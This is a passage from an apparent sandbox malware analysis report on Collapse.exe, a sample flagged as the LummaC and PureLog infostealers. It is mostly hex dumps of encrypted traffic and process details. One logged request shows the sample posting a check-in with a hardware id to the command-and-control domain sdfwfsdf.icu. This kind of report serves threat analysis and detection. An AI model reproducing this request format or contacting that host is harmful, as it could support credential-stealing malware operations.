                                          2025-03-05 13:57:33 UTC15331OUTData Raw: 86 af 24 0f 5f 67 48 13 e8 ba 99 ef cf 8c be 1a 6d c6 84 15 de 56 b9 f8 a8 24 e2 33 5a 77 72 16 99 53 04 17 fe c1 87 40 97 bb 79 a8 d8 d6 8c 2a 01 41 68 0c 53 8e 8e 40 91 55 11 3f 6f 16 98 07 1c 2f 39 ad d1 1c e2 b7 1e 6d 4f 6e b5 e9 fe 02 11 d0 f7 c5 41 c7 af ec 35 a0 1c 4d b9 d7 ea ea 44 5b e9 d4 d5 70 db ea 9b 56 77 56 30 49 af c3 b7 f0 46 e9 ca c0 56 c5 bf 14 c2 80 40 2e 68 d7 06 03 c5 0f ba 66 b8 9b 14 9c 15 80 fc e8 c8 a0 8d c2 f7 16 8e d2 a1 37 f5 56 03 e1 9e 7f 27 33 ec 0b 2d f9 39 76 e0 fa 69 02 16 ed ba c2 0d 29 38 90 00 29 16 21 c2 8f d8 f9 b9 1f 83 c1 dc 84 6b 0b ea d0 52 58 68 64 64 10 39 dc 6f 53 b3 9f 8f 6a d1 dc 14 54 60 4e 5a 38 43 30 3d 71 2a 22 9d a2 5d c1 51 f5 56 81 ad 95 d3 89 5a 2c 55 70 91 0e 9b 7f 6e 3c ab 83 08 82 3f 7f c9 27 9e
                                          Data Ascii: $_gHmV$3ZwrS@y*AhS@U?o/9mOnA5MD[pVwV0IFV@.hf7V'3-9vi)8)!kRXhdd9oSjT`NZ8C0=q*"]QVZ,Upn<?'
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: a5 0b 4c 3e 62 fc ac 46 f4 ff 59 4a 5f 4c a5 95 6b bc a3 4a 68 29 db d6 23 db ac ce 48 45 d1 35 4a e2 57 1c fd 71 cb 8a 7d a2 95 95 62 b6 d2 40 42 b6 88 48 b2 f4 db 89 af 1f 0b 5b 78 25 3f 15 c3 80 5d ab 79 eb db bd f4 5b dc 17 8e 8d b5 61 8c e9 ad 6f 95 f0 34 ae 43 1f 76 e2 78 28 b3 aa 24 1e ca df 57 25 f1 35 44 7c 67 7f fe 53 a8 ce d8 19 57 f7 be 97 e0 4b 3a ea bb d5 ed e6 9c 26 f9 70 4d 12 c5 f8 bb 65 e1 5b 70 c5 96 dd 06 33 c7 32 44 7c 24 ee 12 b8 32 9c 88 fa 48 be 70 7a 22 53 1d 0f cd c6 8c da e6 d4 44 71 dd 23 52 38 1a e7 59 e6 10 42 c8 c8 81 3c 85 cd ba 8b ca 80 b0 36 d8 f5 f3 96 21 3b c3 7d dd 72 c8 55 01 44 1d e9 5d d3 83 86 24 d3 49 6c 8a 0b 8c 7c ae 83 83 dd 33 6b 01 9b 2e d8 6c 20 b5 bd f1 20 c3 74 f2 9e ca ec 76 a7 bd 61 2f f3 2e d3 69 f0 ed
                                          Data Ascii: L>bFYJ_LkJh)#HE5JWq}b@BH[x%?]y[ao4Cvx($W%5D|gSWK:&pMe[p32D|$2Hpz"SDq#R8YB<6!;}rUD]$Il|3k.l tva/.i
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: 0b 44 4c ed 2d 3f 8b 03 3b 44 50 b2 81 57 5b b2 8f 9b ca da d3 67 4c 48 77 03 6c 2b 57 b3 97 f3 f4 b3 b8 2b ae db 2f 2f 43 60 7d f6 6f de d9 bf 88 40 c7 00 c9 10 3a dd c9 3d 0f 47 13 38 8b 8f 67 db 89 27 47 4e cf 51 34 71 b7 97 d6 c2 3b 25 2f 9c 71 be 9f 63 81 17 a9 5c 5a be 19 c0 cf b9 2b 77 5b e6 98 90 d5 97 8b 5a cb ce dc ab 8f 1a 3d 75 46 37 93 43 07 7b 46 d0 85 d6 17 7c 6b 6d 72 c7 b7 e4 1f f4 2c 7c 84 90 e2 35 80 62 8d af fd 08 d9 8f 8d b5 d4 69 60 18 da b5 02 b6 a1 b3 c8 ff 2e 41 8c 77 d9 b9 ec 48 15 69 78 2c a3 09 f7 3f d0 c5 04 4c fc 48 cd 19 27 f8 0e c8 0a 06 97 76 23 01 41 b4 39 68 6b 8c 51 07 fc fa c0 7c 67 61 3e 25 b2 49 fa c0 6f ac 1b 5d 23 06 cc 5a 3c f6 c1 36 8f 60 2f c6 06 5f 6e 9b 1c d5 0f 12 d4 07 eb 0a 2d a4 31 03 99 18 1f 2f 95 17 99
                                          Data Ascii: DL-?;DPW[gLHwl+W+//C`}o@:=G8g'GNQ4q;%/qc\Z+w[Z=uF7C{F|kmr,|5bi`.AwHix,?LH'v#A9hkQ|ga>%Io]#Z<6`/_n-1/
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: 5e 56 7e ae 3f af d6 e1 96 60 5b af 24 1f a1 7b 59 38 89 a7 09 f9 85 36 12 b6 b7 9c 76 99 b4 4c 1c 09 ef c7 07 b9 43 d9 95 ab 6a e5 3f b1 c5 8f 23 c7 ee 9b e9 47 f0 40 6f 86 ba 47 46 54 e9 5f 89 dc cc a0 d2 67 7e 7f 4a bc bf 45 66 a8 06 bd 91 24 d3 7b c5 05 bb 7f 67 da 4a bc 3f 5d 5e 49 4f 11 24 fb 9c fe fd e7 6e 08 08 76 f6 f3 61 c0 23 e5 cc c7 ae c8 ec 44 ea ed 79 4d 76 8d 38 d7 d3 bf ec 49 9d 77 c5 0d 9e 96 c3 ea d1 57 fa 96 c7 4c 21 bb e3 ee f6 d7 b9 ff 7e af 78 1c a5 d1 2d 59 27 08 ef e5 78 33 58 18 dc ad 55 f1 70 fc f9 ad ec 30 e3 48 09 7d d4 6a 6d 2d d2 66 ce ad f9 4e de 5a 0e 22 13 01 46 16 da 31 9a fe 9e 91 87 35 22 fb 32 86 6c 67 d9 b3 3f 44 d4 69 0f c7 c0 e7 f6 4a 8b 74 9f 38 e2 9e a9 09 a3 e2 1e b9 b5 ac 9d 44 9f e8 50 38 d8 b0 89 e8 03 bb 1a
                                          Data Ascii: ^V~?`[${Y86vLCj?#G@oGFT_g~JEf${gJ?]^IO$nva#DyMv8IwWL!~x-Y'x3XUp0H}jm-fNZ"F15"2lg?DiJt8DP8
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: 9e 6d e1 9e 9d 88 3b b0 53 1e 61 be c2 bc c6 83 a8 2a 64 e5 cb 9f e3 a4 91 52 08 89 e3 c2 5f c6 e9 fa 27 8e 8b 68 38 c2 b2 73 57 c7 6c 23 08 a3 b5 02 dc 5b c0 e6 ab b1 04 40 70 de 8c 5a a3 2d 08 b0 8b b7 48 f6 f1 c8 df 6b 27 6d b3 d1 31 6b e1 76 66 f5 77 31 94 b4 0d 4c cc f8 90 2e 46 ab 15 91 90 44 6c 65 22 59 c8 d9 9f 7f e3 e4 87 f9 3e 7e 27 1f 8f 8d 32 a3 30 9f 89 33 ce 61 f3 08 c5 65 5b 89 ca 4b 5f 27 35 db 1b 57 15 75 5e ed a0 a2 22 6e 4b 11 fa c2 df 1d c6 7b 02 d8 5f e4 d0 d1 56 e6 94 7e db cf 56 d2 93 5d 32 f7 cd 55 26 cf f5 e4 92 3b 2a 39 1f 8f e9 d2 48 be 5b a2 9b 6f 0e 74 28 ea 29 e1 13 eb d3 14 ec 30 84 fb df 6a 51 61 d5 17 f1 1e 03 d4 eb 3e 6a cb f0 d7 f6 a3 08 cf d9 d4 44 5a 4f e3 56 fd be 49 88 00 2b a6 c3 a8 30 ca c6 dc 58 dd 1e 58 69 5e 9c
                                          Data Ascii: m;Sa*dR_'h8sWl#[@pZ-Hk'm1kvfw1L.FDle"Y>~'203ae[K_'5Wu^"nK{_V~V]2U&;*9H[ot()0jQa>jDZOVI+0XXi^
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: 01 b5 24 89 5a 2d 06 6e ec b4 cb a9 f7 f2 6a e0 19 93 1d ba 18 f0 bc 53 4c 3e a7 7a 9a e3 f6 a4 b9 f8 08 e7 c6 f7 58 29 78 2f eb 40 6a 8c 04 c0 77 e0 18 38 02 be 1b 05 cb 6e 7d d1 fe d2 c2 cb 74 a6 11 d1 e5 ce 16 97 2c 50 b0 6e 6c a7 70 4b 9e e6 31 60 69 91 dd 50 af b2 16 92 dc 82 24 96 a3 54 7b dc 90 5a ca 4a 7d 54 75 96 aa bc d0 fd 45 17 04 a9 92 03 b6 24 c0 87 75 33 41 43 99 a9 57 c5 7c 79 98 c5 cc e3 d1 1b a7 de 60 af 0c 35 a0 75 b7 e8 21 fd 3d 26 f9 e7 4a 34 93 e0 08 29 d0 db 80 07 c4 7c 80 12 af 3e 40 57 a2 29 25 9b 28 de d4 66 ee 8d 32 12 04 ab f6 6e f5 76 48 96 e0 16 85 d8 60 6c 1e be 63 6b d7 ac 19 2b 55 d4 b5 c0 0c 05 97 27 ef a0 a6 f7 35 2f 89 48 85 4d aa 11 67 44 ae a0 64 34 88 01 d0 5d 3b 6f ff 59 1e 76 5a 6d de 0a ba 3b 11 b7 29 36 3d 65 80
                                          Data Ascii: $Z-njSL>zX)x/@jw8n}t,PnlpK1`iP$T{ZJ}TuE$u3ACW|y`5u!=&J4)|>@W)%(f2nvH`lck+U'5/HMgDd4];oYvZm;)6=e
                                          2025-03-05 13:57:36 UTC | 808 | IN | HTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:36 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vYkjhrcV9FldGem2px4NhuH0l6sxBfvUVlkms0xkBurJQuHNuL9oPGYiuvXIVDEpw1VjlTXz06LvMgGTgIaCzNR93PQvtXClR3tkCaZPJCG5mRjIWcZLxGW1BbK4Hsg%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f86b9ef42e2-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1731&min_rtt=1727&rtt_var=656&sent=196&recv=588&lost=0&retrans=0&sent_bytes=2827&recv_bytes=573027&delivery_rate=1656267&cwnd=188&unsent_bytes=0&cid=3c6b59557e06f595&ts=2904&x=0"


                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                          8          | 192.168.2.5 | 49728       | 188.114.97.3   | 443              | 7096 | C:\Users\user\Desktop\Collapse.exe
                                          Timestamp               | Bytes transferred | Direction | Data
                                          2025-03-05 13:57:37 UTC | 260 | OUT | POST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 89
                                          Host: sdfwfsdf.icu
                                          2025-03-05 13:57:37 UTC | 89 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 71 6e 68 74 7a 71 63 72 61 7a 79 67 26 6a 3d 26 68 77 69 64 3d 44 45 32 37 34 42 33 45 30 37 46 36 34 38 38 36 37 39 45 32 39 30 35 35 33 30 32 43 37 31 37 43
                                          Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--qnhtzqcrazyg&j=&hwid=DE274B3E07F6488679E29055302C717C
                                          2025-03-05 13:57:39 UTC | 809 | IN | HTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:39 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=24Fy7OiJ%2BXIu%2BruwhfEcgeShL8HLiNvBbPrdvuUmeEov1exp8kKT2bTCHbUHPpS8bNpbbpfn5NU3ye3b%2FWQBB8CUGfHTKzlKTTco3iHSjgp3HwdHcB0YJQgbF%2F9nsTM%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f9c2d17c461-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1519&min_rtt=1507&rtt_var=589&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=985&delivery_rate=1820448&cwnd=236&unsent_bytes=0&cid=059d5b6a0ff8aa0b&ts=2057&x=0"
                                          2025-03-05 13:57:39 UTC560INData Raw: 31 39 32 33 0d 0a 55 4c 53 62 46 6a 5a 6d 42 6c 74 46 74 44 4b 79 68 75 4e 32 33 39 37 36 30 35 42 53 32 51 79 43 2f 38 43 65 75 79 61 73 54 32 51 4c 7a 37 6c 77 51 6b 51 38 61 6d 6d 57 56 35 43 38 30 6c 72 39 75 74 6a 70 73 67 37 32 54 65 6d 58 73 4f 54 4e 55 2b 63 4e 4e 68 2f 66 36 48 78 31 56 57 77 44 43 74 70 63 79 4d 4b 62 4e 2b 69 74 6c 62 6a 53 49 75 70 2f 75 70 36 61 71 49 78 6b 35 44 6f 7a 4b 4f 47 71 65 31 67 70 63 32 38 71 38 6e 66 44 31 5a 6f 37 6b 37 75 30 73 4b 59 33 76 30 48 53 75 6f 54 72 77 6b 2f 39 43 41 6b 31 7a 75 4e 6d 57 42 52 31 48 69 43 42 56 4d 58 4d 71 68 65 38 36 63 32 36 39 77 65 4e 66 4d 36 32 74 2b 71 50 46 39 59 2f 55 57 6a 44 6f 30 64 35 55 55 30 52 42 4e 56 57 68 64 61 6b 47 37 6d 4a 6a 59 47 6e 50 75 46 6b 34 35 32 78 79
                                          Data Ascii: 1923ULSbFjZmBltFtDKyhuN2397605BS2QyC/8CeuyasT2QLz7lwQkQ8ammWV5C80lr9utjpsg72TemXsOTNU+cNNh/f6Hx1VWwDCtpcyMKbN+itlbjSIup/up6aqIxk5DozKOGqe1gpc28q8nfD1Zo7k7u0sKY3v0HSuoTrwk/9CAk1zuNmWBR1HiCBVMXMqhe86c269weNfM62t+qPF9Y/UWjDo0d5UU0RBNVWhdakG7mJjYGnPuFk452xy
                                          2025-03-05 13:57:39 UTC1369INData Raw: 34 67 67 61 4e 68 44 6a 64 4a 62 41 37 2b 63 39 50 52 6d 51 4b 59 73 35 2b 41 35 77 44 75 59 4e 37 51 67 66 58 54 56 74 59 35 45 52 76 32 79 56 6c 64 46 57 77 59 64 74 35 71 2f 65 69 4e 44 4a 75 6d 75 2b 54 6a 50 62 4a 4f 38 73 79 76 70 74 70 38 38 47 41 47 45 76 7a 75 54 67 34 6c 56 52 77 72 2b 78 6d 47 36 61 55 7a 36 59 32 44 6e 74 77 33 6c 32 2b 30 6d 71 62 54 36 32 50 6f 4f 68 30 35 35 64 78 34 55 78 78 2b 4b 79 76 47 51 66 66 6a 31 68 43 6f 6c 4c 4f 79 38 32 58 75 5a 65 57 71 6c 4f 37 33 62 39 73 37 55 47 48 4f 36 79 4e 76 55 6b 73 4b 43 6f 5a 35 2b 4d 65 43 45 75 69 4f 76 62 37 31 4a 36 35 65 74 5a 4f 63 73 66 70 4e 78 44 38 65 4a 73 48 51 56 47 51 70 62 53 67 76 39 77 48 59 33 71 77 59 73 35 58 4a 76 4d 67 7a 67 47 50 70 76 62 44 59 67 32 66 4e 46
                                          Data Ascii: 4ggaNhDjdJbA7+c9PRmQKYs5+A5wDuYN7QgfXTVtY5ERv2yVldFWwYdt5q/eiNDJumu+TjPbJO8syvptp88GAGEvzuTg4lVRwr+xmG6aUz6Y2Dntw3l2+0mqbT62PoOh055dx4Uxx+KyvGQffj1hColLOy82XuZeWqlO73b9s7UGHO6yNvUksKCoZ5+MeCEuiOvb71J65etZOcsfpNxD8eJsHQVGQpbSgv9wHY3qwYs5XJvMgzgGPpvbDYg2fNF
                                          2025-03-05 13:57:39 UTC1369INData Raw: 53 59 55 4a 53 4e 79 45 31 67 51 72 46 76 72 49 35 36 4a 57 77 6b 76 45 32 37 6c 7a 46 6b 71 58 72 7a 48 53 62 49 78 55 47 78 4b 6b 75 56 41 46 46 45 67 2f 58 53 38 62 7a 69 54 4c 76 76 4c 76 34 2f 6a 79 6a 53 4c 75 5a 71 50 44 56 46 65 34 45 56 79 53 66 79 55 56 41 55 57 38 54 4d 2b 46 71 39 62 61 46 4e 49 65 48 6b 70 7a 66 4f 5a 35 43 31 72 4b 4d 2b 2f 56 46 6d 69 6f 69 49 2f 32 73 4a 45 34 6f 4e 7a 34 6b 6e 30 50 39 33 71 45 59 69 72 71 72 6f 75 67 6b 72 6c 62 79 75 4b 4f 75 32 6b 6e 50 47 6a 41 67 2f 2f 4a 73 54 79 4e 68 62 7a 65 46 43 6f 4b 32 71 7a 6e 72 70 35 69 4a 38 54 62 75 58 4f 6e 4a 69 4c 58 72 51 64 6b 37 56 79 66 66 34 31 39 41 45 47 34 70 44 38 78 39 32 66 57 4c 4f 70 65 38 67 2b 58 6c 50 4c 4e 31 7a 35 58 34 37 63 4e 6c 39 67 64 55 4e 50
                                          Data Ascii: SYUJSNyE1gQrFvrI56JWwkvE27lzFkqXrzHSbIxUGxKkuVAFFEg/XS8bziTLvvLv4/jyjSLuZqPDVFe4EVySfyUVAUW8TM+Fq9baFNIeHkpzfOZ5C1rKM+/VFmioiI/2sJE4oNz4kn0P93qEYirqrougkrlbyuKOu2knPGjAg//JsTyNhbzeFCoK2qznrp5iJ8TbuXOnJiLXrQdk7Vyff419AEG4pD8x92fWLOpe8g+XlPLN1z5X47cNl9gdUNP
                                          2025-03-05 13:57:39 UTC1369INData Raw: 48 44 51 4e 48 50 6b 42 78 4c 36 69 4e 49 32 45 74 70 72 42 41 4c 59 35 37 4a 79 7a 37 2f 41 4e 6d 7a 67 68 59 59 66 66 5a 46 49 73 54 57 6b 77 7a 56 75 48 31 4b 55 69 6b 62 79 33 74 4f 41 6f 72 33 6e 49 7a 6f 66 62 2f 42 37 34 49 6a 49 49 32 75 70 36 57 43 6c 42 48 77 7a 58 58 4f 48 38 30 53 36 57 69 72 6d 48 34 68 65 38 50 37 61 39 72 39 72 63 61 64 77 41 4d 68 4c 77 77 79 41 4f 50 6d 74 73 43 74 5a 67 31 66 57 6e 51 76 53 50 69 4a 2f 35 50 36 78 6d 30 37 69 73 78 75 74 36 67 77 6b 31 50 39 43 75 63 77 4d 48 63 6a 67 6d 33 32 36 64 37 4b 5a 50 75 61 79 41 68 66 49 58 69 33 53 30 31 4c 66 73 79 31 7a 49 48 6c 5a 67 67 2f 70 63 64 77 64 69 48 41 36 45 66 59 54 76 31 69 53 59 75 62 36 53 38 51 57 6f 62 73 75 61 6c 4f 37 38 62 75 73 74 48 6a 32 66 38 57 5a
                                          Data Ascii: HDQNHPkBxL6iNI2EtprBALY57Jyz7/ANmzghYYffZFIsTWkwzVuH1KUikby3tOAor3nIzofb/B74IjII2up6WClBHwzXXOH80S6WirmH4he8P7a9r9rcadwAMhLwwyAOPmtsCtZg1fWnQvSPiJ/5P6xm07isxut6gwk1P9CucwMHcjgm326d7KZPuayAhfIXi3S01Lfsy1zIHlZgg/pcdwdiHA6EfYTv1iSYub6S8QWobsualO78bustHj2f8WZ
                                          2025-03-05 13:57:39 UTC1369INData Raw: 68 48 68 52 4f 50 30 6b 67 36 78 36 4a 36 55 33 77 6a 75 52 39 47 72 39 2f 33 61 55 4e 38 5a 54 77 69 4e 34 55 46 61 48 6d 67 2b 41 63 78 44 79 74 57 74 4d 37 36 35 67 37 7a 47 48 62 64 38 35 36 32 55 72 49 6c 52 77 43 6c 63 50 5a 2f 52 57 32 5a 56 58 69 6f 2f 2f 47 61 5a 77 39 41 75 76 4b 53 62 75 50 59 6d 72 30 50 30 75 70 54 7a 36 56 37 69 66 52 59 33 68 66 46 47 51 43 6c 48 50 68 44 34 41 6f 54 75 31 54 4f 33 6b 5a 4b 72 38 32 4f 72 50 38 2f 4f 6d 75 37 76 5a 4d 51 6f 48 54 66 5a 2b 6c 39 45 49 30 77 77 49 2b 59 43 2b 4c 4f 4e 42 4b 79 62 6e 2b 62 49 4e 72 56 4f 34 38 65 42 37 64 78 52 2f 51 41 6f 49 76 7a 2f 54 41 55 71 56 32 49 6b 78 32 50 32 74 71 5a 43 70 70 2b 55 76 2b 6b 58 72 6d 44 37 78 35 4c 50 7a 6b 44 77 59 46 78 6b 77 4b 31 42 56 54 64 55
                                          Data Ascii: hHhROP0kg6x6J6U3wjuR9Gr9/3aUN8ZTwiN4UFaHmg+AcxDytWtM765g7zGHbd8562UrIlRwClcPZ/RW2ZVXio//GaZw9AuvKSbuPYmr0P0upTz6V7ifRY3hfFGQClHPhD4AoTu1TO3kZKr82OrP8/Omu7vZMQoHTfZ+l9EI0wwI+YC+LONBKybn+bINrVO48eB7dxR/QAoIvz/TAUqV2Ikx2P2tqZCpp+Uv+kXrmD7x5LPzkDwYFxkwK1BVTdU
                                          2025-03-05 13:57:39 UTC407INData Raw: 54 34 30 34 5a 42 6d 72 75 67 76 63 49 37 72 45 72 74 79 62 6a 56 31 6b 4f 56 65 79 34 64 31 66 4d 39 66 41 39 6a 4d 53 50 6f 48 65 44 49 72 54 32 70 73 4b 6e 68 31 69 69 4c 50 76 57 76 39 39 58 33 62 4f 34 70 46 68 6a 59 37 48 39 62 4d 6b 77 33 45 65 67 64 38 2b 32 4c 4f 72 47 43 31 5a 6a 61 47 65 6c 57 36 59 79 71 33 65 46 68 2f 41 41 4b 50 73 79 69 62 48 64 52 64 54 51 30 77 41 75 43 34 71 41 54 68 65 6a 4e 6b 64 67 6e 6a 31 43 74 68 59 50 4c 30 41 33 45 44 42 5a 68 78 74 70 45 63 68 56 6b 43 53 4c 41 65 63 4b 2b 75 6a 65 4b 76 37 33 71 38 51 47 78 65 71 6d 75 72 50 43 50 58 2b 6b 44 43 51 79 62 72 79 4a 54 46 45 6b 49 41 4e 31 35 78 50 57 31 58 59 69 31 69 70 57 6a 48 62 45 6e 37 5a 65 36 31 75 74 6f 7a 6e 34 4c 41 50 7a 43 59 6e 30 66 52 41 73 31 7a
                                          Data Ascii: T404ZBmrugvcI7rErtybjV1kOVey4d1fM9fA9jMSPoHeDIrT2psKnh1iiLPvWv99X3bO4pFhjY7H9bMkw3Eegd8+2LOrGC1ZjaGelW6Yyq3eFh/AAKPsyibHdRdTQ0wAuC4qAThejNkdgnj1CthYPL0A3EDBZhxtpEchVkCSLAecK+ujeKv73q8QGxeqmurPCPX+kDCQybryJTFEkIAN15xPW1XYi1ipWjHbEn7Ze61utozn4LAPzCYn0fRAs1z
                                          2025-03-05 13:57:39 UTC1369INData Raw: 31 64 36 31 0d 0a 4e 30 33 48 6b 42 31 51 38 37 71 39 53 59 77 31 43 63 48 44 38 57 2b 4c 65 30 68 4c 76 69 37 79 38 6f 57 43 51 57 4f 69 50 67 76 54 75 58 4f 39 38 44 67 6a 37 39 57 41 4f 55 47 39 76 45 74 74 61 32 65 36 4f 49 59 32 43 31 62 6a 39 46 4a 45 34 73 4b 57 51 79 2f 6c 57 7a 69 67 63 42 2f 72 38 62 6e 74 58 64 43 77 32 68 56 48 62 30 71 45 65 75 4f 37 4d 6e 75 4d 46 34 47 37 56 6b 70 72 39 33 51 33 2f 46 6a 45 46 2b 50 35 7a 57 44 6f 70 49 77 71 43 57 34 66 56 6c 78 53 74 72 61 44 69 7a 48 32 75 57 73 7a 47 69 50 61 4a 59 4e 55 73 45 52 33 52 7a 57 39 71 53 57 6f 33 43 76 78 43 31 39 53 37 52 4b 65 59 6c 4c 66 32 4e 4c 78 62 7a 70 69 31 36 6f 35 44 6e 69 59 70 4e 50 58 30 4c 6b 55 65 58 7a 67 41 6a 58 33 75 71 61 59 69 6c 49 61 73 76 36 63 68
                                          Data Ascii: 1d61N03HkB1Q87q9SYw1CcHD8W+Le0hLvi7y8oWCQWOiPgvTuXO98Dgj79WAOUG9vEtta2e6OIY2C1bj9FJE4sKWQy/lWzigcB/r8bntXdCw2hVHb0qEeuO7MnuMF4G7Vkpr93Q3/FjEF+P5zWDopIwqCW4fVlxStraDizH2uWszGiPaJYNUsER3RzW9qSWo3CvxC19S7RKeYlLf2NLxbzpi16o5DniYpNPX0LkUeXzgAjX3uqaYilIasv6ch
                                          2025-03-05 13:57:39 UTC1369INData Raw: 43 72 79 34 35 38 68 79 6f 38 4e 2b 37 66 58 6c 51 31 56 57 6b 56 2f 6b 69 44 77 6f 67 51 72 5a 75 62 34 4f 59 31 6f 47 66 6e 75 50 57 71 7a 32 66 2b 4e 51 38 57 37 4b 70 6c 52 79 39 38 63 44 58 6a 42 50 43 2f 70 67 58 6d 37 38 71 77 39 68 65 75 56 72 71 51 72 36 37 76 55 2b 67 42 48 41 6a 67 7a 55 4a 58 4a 57 6b 76 44 63 46 71 69 75 2b 58 41 4c 43 4b 6c 6f 66 53 61 37 49 36 30 59 61 4e 72 66 6c 46 7a 33 6b 42 44 4a 76 68 65 31 6b 6e 55 54 4e 33 35 58 58 63 34 37 63 34 74 65 71 44 6c 74 77 35 68 53 4f 32 79 5a 6a 6e 2f 47 4f 62 65 41 30 34 7a 63 70 50 42 79 74 78 4c 33 47 46 53 4d 4b 78 30 45 47 72 6e 39 48 6b 33 42 6a 75 52 4f 53 4e 6a 50 7a 2b 44 63 51 72 43 44 66 57 2b 45 4e 2b 48 6b 77 57 43 64 39 34 68 2b 53 78 48 61 79 30 75 59 61 6a 59 36 46 45 32
                                          Data Ascii: Cry458hyo8N+7fXlQ1VWkV/kiDwogQrZub4OY1oGfnuPWqz2f+NQ8W7KplRy98cDXjBPC/pgXm78qw9heuVrqQr67vU+gBHAjgzUJXJWkvDcFqiu+XALCKlofSa7I60YaNrflFz3kBDJvhe1knUTN35XXc47c4teqDltw5hSO2yZjn/GObeA04zcpPBytxL3GFSMKx0EGrn9Hk3BjuROSNjPz+DcQrCDfW+EN+HkwWCd94h+SxHay0uYajY6FE2
                                          2025-03-05 13:57:39 UTC1369INData Raw: 68 53 65 73 46 56 44 62 38 39 55 52 67 4c 7a 63 73 64 65 4e 36 34 39 43 58 4e 4b 36 4c 6a 5a 44 42 5a 4c 78 42 79 4d 61 50 39 63 4e 31 6d 79 4d 53 46 4d 58 49 64 41 52 56 66 68 49 68 35 31 37 41 78 4e 63 2f 72 62 4b 49 34 63 63 71 75 6a 7a 76 73 5a 6a 35 36 6d 6e 70 4f 51 38 54 34 65 6c 58 5a 69 56 4c 45 69 4c 57 58 63 76 71 70 68 47 50 69 59 76 68 32 52 7a 70 5a 65 6d 49 75 50 75 4b 56 4a 55 32 4b 44 75 47 30 6c 78 54 4a 45 64 76 46 70 39 6a 2b 4e 57 51 4e 2b 65 58 6a 62 72 53 4a 37 4e 48 31 36 79 42 70 39 70 55 39 53 68 58 41 2f 2f 34 59 58 77 78 5a 7a 68 79 67 31 6e 64 30 36 38 73 6b 2b 75 4e 6f 71 68 6a 6f 33 79 32 6d 72 65 6f 32 47 6d 66 4c 69 30 6e 31 66 38 68 5a 6a 4a 72 50 52 6d 62 52 65 54 30 6a 77 53 4f 73 70 69 6a 6f 52 36 73 53 39 43 75 6c 2f
                                          Data Ascii: hSesFVDb89URgLzcsdeN649CXNK6LjZDBZLxByMaP9cN1myMSFMXIdARVfhIh517AxNc/rbKI4ccqujzvsZj56mnpOQ8T4elXZiVLEiLWXcvqphGPiYvh2RzpZemIuPuKVJU2KDuG0lxTJEdvFp9j+NWQN+eXjbrSJ7NH16yBp9pU9ShXA//4YXwxZzhyg1nd068sk+uNoqhjo3y2mreo2GmfLi0n1f8hZjJrPRmbReT0jwSOspijoR6sS9Cul/



                                          Target ID: 0
                                          Start time: 08:57:17
                                          Start date: 05/03/2025
                                          Path: C:\Users\user\Desktop\Collapse.exe
                                          Wow64 process (32bit): true
                                          Commandline: "C:\Users\user\Desktop\Collapse.exe"
                                          Imagebase: 0xf40000
                                          File size: 425'984 bytes
                                          MD5 hash: 04EACC602D626EBA16224FDC15EF8AA5
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2033769866.0000000000F42000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation: low
                                          Has exited: true

                                          Target ID: 1
                                          Start time: 08:57:17
                                          Start date: 05/03/2025
                                          Path: C:\Users\user\Desktop\Collapse.exe
                                          Wow64 process (32bit): true
                                          Commandline: "C:\Users\user\Desktop\Collapse.exe"
                                          Imagebase: 0xf50000
                                          File size: 425'984 bytes
                                          MD5 hash: 04EACC602D626EBA16224FDC15EF8AA5
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.3294762708.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation: low
                                          Has exited: false

                                          Target ID: 4
                                          Start time: 08:57:17
                                          Start date: 05/03/2025
                                          Path: C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit): true
